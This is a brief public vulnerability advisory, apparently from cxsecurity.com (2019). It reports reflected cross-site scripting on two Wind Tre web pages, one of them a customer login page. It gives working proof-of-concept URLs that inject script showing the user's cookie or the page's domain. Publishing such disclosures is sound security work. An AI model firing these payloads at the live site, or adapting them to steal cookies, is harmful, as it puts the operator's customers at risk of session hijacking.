Wind Tre S.P.A mobile operator is Vulnerable to Cross Site Scripting Attack

2019-07-24 / 2019-07-25
at wind.it (AT) at
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Wind Tre S.P.A is vulnerable to Cross Site Scripting Attack https://www.wind.it/windcode/wind/windgsa/proxy_ricerca.php?q=xxxrmgo0%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ethpteoddgol&command=autosuggest&site=wind_assistenza&channel=wic&ie_browser=0&client=wind https://windecare.wind.it/ecare/login?username=vul'%3balert(document.domain)%2f%2f656tckx4u&password=ggggggggggg&Ricordami=ON&from155=OK


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top